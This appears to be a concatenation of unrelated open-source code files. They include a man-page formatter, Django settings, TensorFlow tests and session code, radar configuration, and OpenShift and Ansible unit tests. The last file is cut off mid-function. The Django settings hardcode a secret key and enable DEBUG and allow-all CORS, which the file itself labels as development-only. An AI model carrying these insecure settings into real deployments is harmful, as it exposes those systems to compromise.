optparse.HelpFormatter.__init__(self, indent_increment, max_help_position, width, short_first)
def format_heading(self, heading):
return '.SH %s\n' % heading.upper()
def format_description(self, description):
return description
def format_option(self, option):
try:
optstring = option.option_strings
except AttributeError:
optstring = self.format_option_strings(option)
if option.help:
help = ' '.join([l.strip() for l in option.help.splitlines()])
else:
help = ''
return '''.IP "%s"
%s
''' % (optstring, help)
def format_head(self, optparser, metadata, section=1):
pgm = optparser.get_prog_name()
short_desc = self.format_short_description(pgm, metadata['short_desc'])
long_desc = self.format_long_description(pgm, metadata['long_desc'])
return '%s\n%s\n%s\n%s' % (self.format_title(pgm, section), short_desc, self.format_synopsis(optparser), long_desc)
def format_title(self, pgm, section):
date = '-'.join([str(num) for num in time.localtime()[:3]])
return '.TH %s %s "%s" %s' % (pgm, section, date, pgm)
def format_short_description(self, pgm, short_desc):
return '''.SH NAME
.B %s
\- %s
''' % (pgm, short_desc.strip())
def _markup(self, txt):
"""Prepares txt to be used in man pages."""
return txt.replace('-', '\\-')
def format_synopsis(self, optparser):
synopsis = optparser.get_usage()
pgm=optparser.get_prog_name()
if synopsis:
synopsis = synopsis.replace('Usage: %s '%pgm, '')
return '.SH SYNOPSIS\n.B %s\n%s\n' % (self._markup(pgm),synopsis)
def format_long_description(self, pgm, long_desc):
long_desc = '\n'.join([line.lstrip()
for line in long_desc.splitlines()])
long_desc = long_desc.replace('\n.\n', '\n\n')
if long_desc.lower().startswith(pgm):
long_desc = long_desc[len(pgm):]
return '''.SH DESCRIPTION
.B %s
%s
''' % (pgm, long_desc.strip())
def format_tail(self, metadata, seealso=None):
return ('.SH SEE ALSO\n%s\n'%seealso if seealso else '')+'''.SH COPYRIGHT
%s %s
%s
.SH BUGS
Please report bugs to the project\'s bug tracker at
.br
%s
.SH AUTHOR
%s (%s)
''' % (metadata['copyright'],metadata['author'],metadata['license'],metadata['bugtracker'],metadata['author'],metadata['author_contact'])
def generate_manpage(optparser,metadata,fileOut,seealso=None,section=1):
"""generate a man page from an optparse parser"""
out=open(fileOut,'w')
formatter=ManHelpFormatter()
formatter.parser=optparser
out.write(formatter.format_head(optparser,metadata,section))
out.write(optparser.format_option_help(formatter))
out.write(formatter.format_tail(metadata,seealso))
|
gpl-2.0
|
TeamFeH/back-end
|
back_end/back_end/settings.py
|
1
|
2221
|
"""
Django settings for back_end project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'j0s&zg)yled@4yu4ja%r9u_kob(#7oxv4wdsnmcz#ey-r!0r+0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'shelf_json_manager',
'corsheaders',
'taggit',
'colorful',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'back_end.urls'
WSGI_APPLICATION = 'back_end.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
CORS_ORIGIN_ALLOW_ALL = True
|
gpl-2.0
|
sandeepgupta2k4/tensorflow
|
tensorflow/contrib/distributions/python/kernel_tests/bijectors/exp_test.py
|
73
|
2307
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exp Tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops.bijectors.exp import Exp
from tensorflow.python.ops.distributions.bijector_test_util import assert_bijective_and_finite
from tensorflow.python.ops.distributions.bijector_test_util import assert_scalar_congruency
from tensorflow.python.platform import test
class ExpBijectorTest(test.TestCase):
"""Tests correctness of the Y = g(X) = exp(X) transformation."""
def testBijector(self):
with self.test_session():
bijector = Exp(event_ndims=1)
self.assertEqual("exp", bijector.name)
x = [[[1.], [2.]]]
y = np.exp(x)
self.assertAllClose(y, bijector.forward(x).eval())
self.assertAllClose(x, bijector.inverse(y).eval())
self.assertAllClose(
-np.sum(np.log(y), axis=-1),
bijector.inverse_log_det_jacobian(y).eval())
self.assertAllClose(-bijector.inverse_log_det_jacobian(np.exp(x)).eval(),
bijector.forward_log_det_jacobian(x).eval())
def testScalarCongruency(self):
with self.test_session():
bijector = Exp()
assert_scalar_congruency(
bijector, lower_x=-2., upper_x=1.5, rtol=0.05)
def testBijectiveAndFinite(self):
with self.test_session():
bijector = Exp(event_ndims=0)
x = np.linspace(-10, 10, num=10).astype(np.float32)
y = np.logspace(-10, 10, num=10).astype(np.float32)
assert_bijective_and_finite(bijector, x, y)
if __name__ == "__main__":
test.main()
|
apache-2.0
|
weightedEights/runDBcheck
|
RADAR_DATA/20170713.001/Source/Shell/setup.py
|
5
|
7913
|
"""
This class holds all the info needed to configure
a given setup from an experiment file
"""
import logging
import os
from pylib.Inifile import Inifile
from pylib.TuFile import TuFile
from pylib.rxclasses import rxConfig
from pylib.txclasses import txConfig
from pylib.beamcodeclasses import beamcodesConfig
from modeclasses import modeConfig
class setup:
def __init__(self,exp,id,extconf):
self.log = logging.getLogger('setup')
self.exp = exp
self.id = int(id)
self.extconf = extconf
# shortcut to self.exp.binConfig
bconf = self.exp.binConfig
# Read config values from expfile
dtc = self.exp.dtc
commonsec = 'Common Mode:%d' % (self.id)
mainsec = '%s Mode:%d' % (self.exp.dtc,self.id)
# Common stuff
self.nPulsesInt = self.exp.experimentConfig.getint('common parameters','npulsesint',0)
self.ippMask = self.exp.experimentConfig.getint('common parameters','ippmask',1)
self.maxSamples = self.exp.experimentConfig.getint(mainsec,'maxsamples',50000)
outputmask = self.exp.systemConfig.getint('common parameters','outputmask',0xffffffff)
self.outputMask = self.exp.experimentConfig.getint('common parameters','outputmask',outputmask)
self.useSpecialBeamcodes = self.exp.experimentConfig.getint('common parameters','usespecialbeamcodes',0)
# Trig
trig = self.exp.systemConfig.getint(dtc,'internaltrig',0)
self.internalTrig = self.exp.experimentConfig.getint(dtc,'internaltrig',trig)
# Synchronize RF and TR (remove TR when RF is turned off)
self.syncrftr = self.exp.systemConfig.getint('common parameters','syncrftr',1)
# Write display record
wdr = self.exp.systemConfig.getint(dtc,'writedisplayrecord',True)
wdr = self.exp.experimentConfig.getint(dtc,'writedisplayrecord',wdr)
wdr = self.exp.experimentConfig.getint(mainsec,'writedisplayrecord',wdr)
wdr = self.exp.experimentConfig.getint('common parameters','writedisplayrecord',wdr)
self.writeDisplayRecord = wdr
# Amisr upconverter TR pulse width control
controltr = self.exp.systemConfig.getint(dtc,'controltr',0)
self.controlTr = self.exp.experimentConfig.getint(dtc,'controltr',controltr)
if self.controlTr:
widthinc = self.exp.systemConfig.getfloat(dtc,'widthincperpulse',0.5)
self.widthInc = self.exp.experimentConfig.getfloat(dtc,'widthincperpulse',widthinc)
cntlwidth = self.exp.systemConfig.getint(dtc,'controlwidth',500)
self.controlWidth = self.exp.experimentConfig.getint(dtc,'controlwidth',cntlwidth)
# TxEnabled
self.txEnabled = self.exp.experimentConfig.getint(mainsec,'txenabled',False)
# Tu handling
self.tuFilename = tuFile = self.exp.experimentConfig.get(mainsec,'tufile','')
self.tuImage = bconf.binImage(tuFile)
self.log.info('Reading tu image: %s' % (tuFile))
# Rx handling
self.rxAttenuation = self.exp.experimentConfig.getint(mainsec,'rxattenuation',0)
self.rxFrequency = self.exp.experimentConfig.getfloat(mainsec,'rxfrequency',0)
self.rxcFile = rxcFile = self.exp.experimentConfig.get(mainsec,'rxconfig','')
rxc = bconf.inifile(rxcFile)
self.filterFile = rxc.get('filter','file','')
self.rxNode = bconf.binPath(rxc.Filename)
self.log.info('Reading Rx config file: %s' % (rxcFile))
# Tx handling
txcFile = self.exp.experimentConfig.get(mainsec,'txconfig','')
if txcFile <> '':
self.log.info('Reading Tx image: %s' % (txcFile))
self.txImage = bconf.binImage(txcFile)
self.txConfigText = bconf.text(txcFile)
else:
# No txc file specified. Read default values from system.ini file
self.log.info('Reading default Tx image')
self.txImage = bconf.binImage('default.tx.image')
self.txConfigText = bconf.text('default.tx.config')
# Beam codes
bcoFile = self.exp.experimentConfig.get(commonsec,'beamcodefile','')
if bcoFile == '':
bcoFile = self.exp.experimentConfig.get(mainsec,'beamcodefile')
self.beamcodesFilename = bcoFile
self.beamcodes = bconf.beamcodes(bcfile=bcoFile)
# Modes
self.modes = []
smodes = self.exp.experimentConfig.get(mainsec,'modes','')
modenames = smodes.split(' ')
for m in modenames:
self.log.info('Reading config info for mode: %s' % (m))
modeconf = modeConfig(self.exp.experimentConfig,self.exp.dtc,self.id,m)
modegroup = int(modeconf.pars['modegroup'])
try:
bcp = bconf.beamcodesPath(tuFile,modegroup,bcoFile)
modeconf.pars['beamcodes'] = bconf[bcp]
except:
# Alternate beamcode used for this mode group
bcp = bconf.beamcodesPath(tuFile,modegroup)
modeconf.pars['beamcodes'] = bconf[bcp]
modeconf.pars['activepulses'] = bconf['%s/activepulses' % (bcp)]
modeconf.pars['totalpulses'] = bconf['%s/totalpulses' % (bcp)]
# Add special info from other places
# Common stuff
modeconf.pars['npulsesint'] = self.nPulsesInt
modeconf.pars['nradacheaderwords'] = extconf['nradacheaderwords']
# Rx stuff
modeconf.pars['filterrangedelay'] = bconf['%s/filterrangedelay' % (self.rxNode)]
modeconf.pars['sampletime'] = bconf['%s/sampletime' % (self.rxNode)]
modeconf.pars['samplespacing'] = bconf['%s/samplespacing' % (self.rxNode)]
self.modes.append(modeconf)
def loadBeamcodes(self,filename):
if os.path.exists(filename):
bcoFile = filename
else:
bcoFile = os.path.join(self.exp.experimentConfigPath,filename)
self.log.debug(bcoFile)
self.beamcodes = beamcodesConfig(bcoFile)
# Change beamcodes in mode configurations
for modeconf in self.modes:
self.usedBeamcodes(modeconf)
def usedBeamcodes(self,modeconf):
"""
This function is supposed to find all uniq beamcodes used in a modegroup
so they can be passed down to the mode dll where they are used for
storage allocation and data sorting. It does that using modegroup info
from the exp file, the TU file and currently configured beamcodes table.
"""
modegroup = int(modeconf.pars['modegroup'])
indxHeaders = self.tu.Index(bit=11)
npulses = len(indxHeaders)
indxBct = self.tu.Index(bit=12)
indxMg = self.tu.Index(bit=-2,specialwordaddress=3,specialword=modegroup)
bcs = []
for mg in indxMg:
indx = 0
for bct in indxBct:
if bct > mg:
break
else:
indx += 1
bcs.append(self.beamcodes.codes[indx])
# Find uniq codes and sort them
sbcs = []
for c in bcs:
if c not in sbcs:
sbcs.append(c)
sbcs.sort()
modeconf.pars['beamcodes'] = sbcs
modeconf.pars['activepulses'] = len(indxMg)
npi = int(modeconf.pars['npulsesint'])
ap = modeconf.pars['activepulses']
modeconf.pars['totalpulses'] = npi*ap/len(indxHeaders)
if (npi % npulses):
self.log.error('npulsesframe: %d is not a multiple of npulsesint: %d' % (npulses,npi))
|
gpl-3.0
|
tiwillia/openshift-tools
|
openshift/installer/vendored/openshift-ansible-3.5.5/roles/lib_openshift/src/test/unit/oc_secret.py
|
2
|
2783
|
#!/usr/bin/env python2
'''
Unit tests for oc secret
'''
# To run:
# ./oc_secret.py
#
# .
# Ran 1 test in 0.002s
#
# OK
import os
import sys
import unittest
import mock
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error,wrong-import-position
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_secret import OCSecret # noqa: E402
class OCSecretTest(unittest.TestCase):
'''
Test class for OCSecret
'''
def setUp(self):
''' setup method will create a file and set to known configuration '''
pass
@mock.patch('oc_secret.OCSecret.openshift_cmd')
def test_adding_a_secret(self, mock_openshift_cmd):
''' Testing adding a secret '''
# Arrange
# run_ansible input parameters
params = {
'state': 'present',
'namespace': 'default',
'name': 'secretname',
'contents': [{
'path': "/tmp/somesecret.json",
'data': "{'one': 1, 'two': 2, 'three', 3}",
}],
'decode': False,
'kubeconfig': '/etc/origin/master/admin.kubeconfig',
'debug': False,
'files': None,
'delete_after': True,
}
# Return values of our mocked function call. These get returned once per call.
mock_openshift_cmd.side_effect = [
{
"cmd": "/usr/bin/oc get secrets -o json secretname",
"results": "",
"returncode": 0,
}, # oc output for first call to openshift_cmd (oc secrets get)
{
"cmd": "/usr/bin/oc secrets new secretname somesecret.json=/tmp/somesecret.json",
"results": "",
"returncode": 0,
}, # oc output for second call to openshift_cmd (oc secrets new)
]
# Act
results = OCSecret.run_ansible(params, False)
# Assert
self.assertTrue(results['changed'])
self.assertEqual(results['results']['returncode'], 0)
self.assertEqual(results['state'], 'present')
# Making sure our mock was called as we expected
mock_openshift_cmd.assert_has_calls([
mock.call(['get', 'secrets', 'secretname', '-o', 'json'], output=True),
mock.call(['secrets', 'new', 'secretname', 'somesecret.json=/tmp/somesecret.json']),
])
def tearDown(self):
'''TearDown method'''
pass
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
pmarques/ansible
|
test/units/plugins/become/test_sudo.py
|
11
|
1252
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2020 Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible import context
from ansible.plugins.loader import become_loader, shell_loader
def test_sudo(mocker, parser, reset_cli_args):
options = parser.parse_args([])
context._init_global_context(options)
sudo = become_loader.get('sudo')
sh = shell_loader.get('sh')
sh.executable = "/bin/bash"
sudo.set_options(direct={
'become_user': 'foo',
'become_flags': '-n -s -H',
})
cmd = sudo.build_become_command('/bin/foo', sh)
assert re.match(r"""sudo\s+-n -s -H\s+-u foo /bin/bash -c 'echo BECOME-SUCCESS-.+? ; /bin/foo'""", cmd), cmd
sudo.set_options(direct={
'become_user': 'foo',
'become_flags': '-n -s -H',
'become_pass': 'testpass',
})
cmd = sudo.build_become_command('/bin/foo', sh)
assert re.match(r"""sudo\s+-s\s-H\s+-p "\[sudo via ansible, key=.+?\] password:" -u foo /bin/bash -c 'echo BECOME-SUCCESS-.+? ; /bin/foo'""", cmd), cmd
|
gpl-3.0
|
alansaid/RecipeParser
|
parseRecipeData.py
|
1
|
2285
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convert JSON data to human-readable form.
Usage:
prettyJSON.py domain team
"""
import sys
import glob
import traceback
def main(args):
authors = {}
userFile = open('parsed/parsedProfiles.tsv', 'r')
userIds = {}
for line in userFile:
userData = line.split("\t")
siteid = userData[2]
userid = userData[0]
userIds[siteid] = userid
recipeFile = open("parsed/parsedRecipes.tsv", 'w')
lines = 0
file = open("input/recipes.tsv", "r")
recipeID = 0
for line in file:
try:
line = line.rstrip('\n')
if "\t404" in line:
continue
recipeID = recipeID + 1
[url, title, servings, username, userID, cookingTime] = line.split("\t")
#print "url: " + url
#print "title: " + title
#print "servings: " + servings
#print "username: " + username
#print "userID: " + userID
#print "cookingTime: " + cookingTime
myUserID = ""
if userID in userIds:
myUserID = userIds.get(userID)
cookingTime = cookingTime.strip()
if len(cookingTime) > 1:
num = 0
mins = 0
[no, unit] = cookingTime.split(" ")
no = no.strip("+")
if unit == "day" or unit == "days":
mins = 1560
elif unit == "hr" or unit == "hrs":
mins = 60
elif unit == "min" or unit == "mins":
mins = 1
if "¼" in no:
no = no.strip("¼").strip() + ".25"
elif "½" in no:
no = no.strip("½").strip() + ".5"
elif "¾" in no:
no = no.strip("¾").strip() + ".75"
cookingTimeInMinutes = int(float(no) * int(mins))
output = str(recipeID) + "\t" + title + "\t" + servings + "\t" + cookingTime + "\t" + str(cookingTimeInMinutes) + "\t" + myUserID + "\t" + userID + "\t" + username + "\t" + url + "\n"
#output = str(recipeID) + "\t" + url + "\t" + title + "\t" + servings + "\t" + username + "\t" + userID + "\t" + myUserID + "\t" + cookingTime + "\t" + str(cookingTimeInMinutes) + "\n"
recipeFile.write(output)
# if lines == 200:
# sys.exit()
except ValueError:
print line
print len(cookingTime)
print len(line.split("\t"))
print sys.exc_info()[0]
print traceback.format_exc()
sys.exit()
#pass
file.close()
recipeFile.close()
return True
def usage():
print __doc__
if __name__ == "__main__":
sys.exit(not main(sys.argv))
|
gpl-2.0
|
anilmuthineni/tensorflow
|
tensorflow/python/training/monitored_session.py
|
8
|
35656
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper of Session API which runs hooks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as training_saver
from tensorflow.python.training import session_manager as sm
from tensorflow.python.training import session_run_hook
# TODO(touts): Share that with the Supervisor.
class Scaffold(object):
"""Structure to create or gather pieces commonly needed to train a model.
When you build a model for training you usually need ops to initialize
variables, a `Saver` to checkpoint them, an op to collect summaries for
the visualizer, and so on.
Various libraries built on top of the core TensorFlow library take care of
creating some or all of these pieces and storing them in well known
collections in the graph. The `Scaffold` class helps pick these pieces from
the graph collections, creating and adding them to the collections if needed.
If you call the scaffold constructor without any arguments, it will pick
pieces from the collections, creating default ones if needed when
`scaffold.finalize()` is called. You can pass arguments to the constructor to
provide your own pieces. Pieces that you pass to the constructor are not
added to the graph collections.
The following pieces are directly accessible as attributes of the `Scaffold`
object:
* `saver`: A `tf.Saver` object taking care of saving the variables. Picked
from and stored into the `SAVERS` collection in the graph by default.
* `init_op`: An op to run to initialize the variables. Picked from and
stored into the `INIT_OP` collection in the graph by default.
* `ready_op`: An op to verify that the variables are initialized. Picked
from and stored into the `READY_OP` collection in the graph by default.
* `ready_for_local_init_op`: An op to verify that global state has been
initialized and it is alright to run `local_init_op`. Picked from and
stored into the `READY_FOR_LOCAL_INIT_OP` collection in the graph by
default. This is needed when the initialization of local variables depends
on the values of global variables.
* `local_init_op`: An op to initialize the local variables. Picked
from and stored into the `LOCAL_INIT_OP` collection in the graph by default.
* `summary_op`: An op to run and merge the summaries in the graph. Picked
from and stored into the `SUMMARY_OP` collection in the graph by default.
* `global_step`: A tensor containing the global step counter. Picked
from and stored into the `GLOBAL_STEP` collection in the graph by default.
You can also pass the following additional pieces to the constructor:
* `init_feed_dict`: A sessionn feed dictionary that should be used when
running the init op.
* `init_fn`: A callable to run run after the init op to perform additional
initializations. The callable will be called as
`init_fn(scaffold, session)`.
"""
def __init__(self,
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=None,
summary_op=None,
saver=None):
"""Create a scaffold.
Args:
init_op: Optional op for initializing variables.
init_feed_dict: Optional session feed dictionary to use when running the
init_op.
init_fn: Optional function to use to initialize the model after running
the init_op. Will be called as `init_fn(scaffold, session)`.
ready_op: Optional op to verify that the variables are initialized. Must
return an empty 1D string tensor when the variables are initialized, or
a non-empty 1D string tensor listing the names of the non-initialized
variables.
ready_for_local_init_op: Optional op to verify that the global variables
are initialized and `local_init_op` can be run. Must return an empty
1D string tensor when the global variables are initialized, or a
non-empty 1D string tensor listing the names of the non-initialized
global variables.
local_init_op: Optional op to initialize local variables.
summary_op: Optional op to gather all summaries. Must return a scalar
string tensor containing a serialized `Summary` proto.
saver: Optional `tf.Saver` object to use to save and restore variables.
"""
# NOTE(touts): modifying the init function to be passed the scaffold is a
# hack to make it easy to find the saver. Is there a better way?
if init_fn:
self._init_fn = lambda sess: init_fn(self, sess)
else:
self._init_fn = None
self._init_op = init_op
self._ready_op = ready_op
self._ready_for_local_init_op = ready_for_local_init_op
self._local_init_op = local_init_op
self._summary_op = summary_op
self._saver = saver
self._init_feed_dict = init_feed_dict
def finalize(self):
"""Creates operations if needed and finalizes the graph."""
if self._init_op is None:
def default_init_op():
return control_flow_ops.group(
variables.global_variables_initializer(),
resources.initialize_resources(resources.shared_resources()))
self._init_op = Scaffold.get_or_default(
'init_op',
ops.GraphKeys.INIT_OP,
default_init_op)
if self._ready_op is None:
def default_ready_op():
return array_ops.concat([
variables.report_uninitialized_variables(),
resources.report_uninitialized_resources()
], 0)
self._ready_op = Scaffold.get_or_default(
'ready_op', ops.GraphKeys.READY_OP,
default_ready_op)
if self._ready_for_local_init_op is None:
def default_ready_for_local_init_op():
return variables.report_uninitialized_variables(
variables.global_variables())
self._ready_for_local_init_op = Scaffold.get_or_default(
'ready_for_local_init_op', ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
default_ready_for_local_init_op)
if self._local_init_op is None:
self._local_init_op = Scaffold.get_or_default(
'local_init_op', ops.GraphKeys.LOCAL_INIT_OP,
Scaffold._default_local_init_op)
if self._summary_op is None:
self._summary_op = Scaffold.get_or_default('summary_op',
ops.GraphKeys.SUMMARY_OP,
summary.merge_all)
# pylint: disable=g-long-lambda
if self._saver is None:
self._saver = Scaffold.get_or_default(
'saver',
ops.GraphKeys.SAVERS,
lambda: training_saver.Saver(sharded=True, allow_empty=True,
write_version=saver_pb2.SaverDef.V2))
# pylint: enable=g-long-lambda
self._saver.build()
ops.get_default_graph().finalize()
return self
@property
def init_fn(self):
return self._init_fn
@property
def init_op(self):
return self._init_op
@property
def ready_op(self):
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def local_init_op(self):
return self._local_init_op
@property
def summary_op(self):
return self._summary_op
@property
def saver(self):
return self._saver
@property
def init_feed_dict(self):
return self._init_feed_dict
@staticmethod
def get_or_default(arg_name, collection_key, default_constructor):
"""Get from cache or create a default operation."""
elements = ops.get_collection(collection_key)
if elements:
if len(elements) > 1:
raise RuntimeError('More than one item in the collection "%s". '
'Please indicate which one to use by passing it to '
'the tf.Scaffold constructor as: '
'tf.Scaffold(%s=item to use)', collection_key,
arg_name)
return elements[0]
op = default_constructor()
if op is not None:
ops.add_to_collection(collection_key, op)
return op
@staticmethod
def _default_local_init_op():
return control_flow_ops.group(variables.local_variables_initializer(),
data_flow_ops.tables_initializer())
def MonitoredTrainingSession(master='', # pylint: disable=invalid-name
is_chief=True,
checkpoint_dir=None,
scaffold=None,
hooks=None,
chief_only_hooks=None,
save_checkpoint_secs=600,
save_summaries_steps=100,
save_summaries_secs=None,
config=None):
"""Creates a `MonitoredSession` for training.
For a chief, this utility sets proper session initializer/restorer. It also
creates hooks related to checkpoint and summary saving. For workers, this
utility sets proper session creator which waits for the chief to
inialize/restore.
Args:
master: `String` the TensorFlow master to use.
is_chief: If `True`, it will take care of initialization and recovery the
underlying TensorFlow session. If `False`, it will wait on a chief to
initialize or recover the TensorFlow session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
hooks: Optional list of `SessionRunHook` objects.
chief_only_hooks: list of `SessionRunHook` objects. Activate these hooks if
`is_chief==True`, ignore otherwise.
save_checkpoint_secs: The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If `save_checkpoint_secs` is set to
`None`, then the default checkpoint saver isn't used.
save_summaries_steps: The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used.
save_summaries_secs: The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used.
config: an instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of constructor of `tf.Session`.
Returns:
A `MonitoredSession` object.
"""
scaffold = scaffold or Scaffold()
if not is_chief:
session_creator = WorkerSessionCreator(
scaffold=scaffold, master=master, config=config)
return MonitoredSession(session_creator=session_creator, hooks=hooks or [])
all_hooks = []
if chief_only_hooks:
all_hooks.extend(chief_only_hooks)
session_creator = ChiefSessionCreator(
scaffold=scaffold,
checkpoint_dir=checkpoint_dir,
master=master,
config=config)
if checkpoint_dir:
all_hooks.append(
basic_session_run_hooks.StepCounterHook(output_dir=checkpoint_dir))
if (save_summaries_steps and save_summaries_steps > 0) or (
save_summaries_secs and save_summaries_secs > 0):
all_hooks.append(basic_session_run_hooks.SummarySaverHook(
scaffold=scaffold,
save_steps=save_summaries_steps,
save_secs=save_summaries_secs,
output_dir=checkpoint_dir))
if save_checkpoint_secs and save_checkpoint_secs > 0:
all_hooks.append(basic_session_run_hooks.CheckpointSaverHook(
checkpoint_dir, save_secs=save_checkpoint_secs, scaffold=scaffold))
if hooks:
all_hooks.extend(hooks)
return MonitoredSession(session_creator=session_creator, hooks=all_hooks)
class SessionCreator(object):
"""A factory for tf.Session."""
@abc.abstractmethod
def create_session(self):
raise NotImplementedError(
'create_session is not implemented for {}.'.format(self))
class ChiefSessionCreator(SessionCreator):
"""Creates a tf.Session for a chief."""
def __init__(self,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
checkpoint_filename_with_path=None):
"""Initializes a chief session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
checkpoint_filename_with_path: Full file name path to the checkpoint file.
"""
self._checkpoint_dir = checkpoint_dir
self._checkpoint_filename_with_path = checkpoint_filename_with_path
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().prepare_session(
self._master,
saver=self._scaffold.saver,
checkpoint_dir=self._checkpoint_dir,
checkpoint_filename_with_path=self._checkpoint_filename_with_path,
config=self._config,
init_op=self._scaffold.init_op,
init_feed_dict=self._scaffold.init_feed_dict,
init_fn=self._scaffold.init_fn)
class WorkerSessionCreator(SessionCreator):
"""Creates a tf.Session for a worker."""
def __init__(self, scaffold=None, master='', config=None):
"""Initializes a worker session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
"""
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().wait_for_session(
self._master, config=self._config)
class _MonitoredSession(object):
"""See `MonitoredSession` or `SingularMonitoredSession`."""
def __init__(self, session_creator, hooks, should_recover):
"""Sets up a Monitored or Hooked Session.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` or a `WorkerSessionCreator`.
hooks: An iterable of `SessionRunHook' objects.
should_recover: A bool. Indicates whether to recover from `AbortedError`
or not.
"""
self._graph_was_finalized = ops.get_default_graph().finalized
self._hooks = hooks or []
for h in self._hooks:
h.begin()
# Create the session.
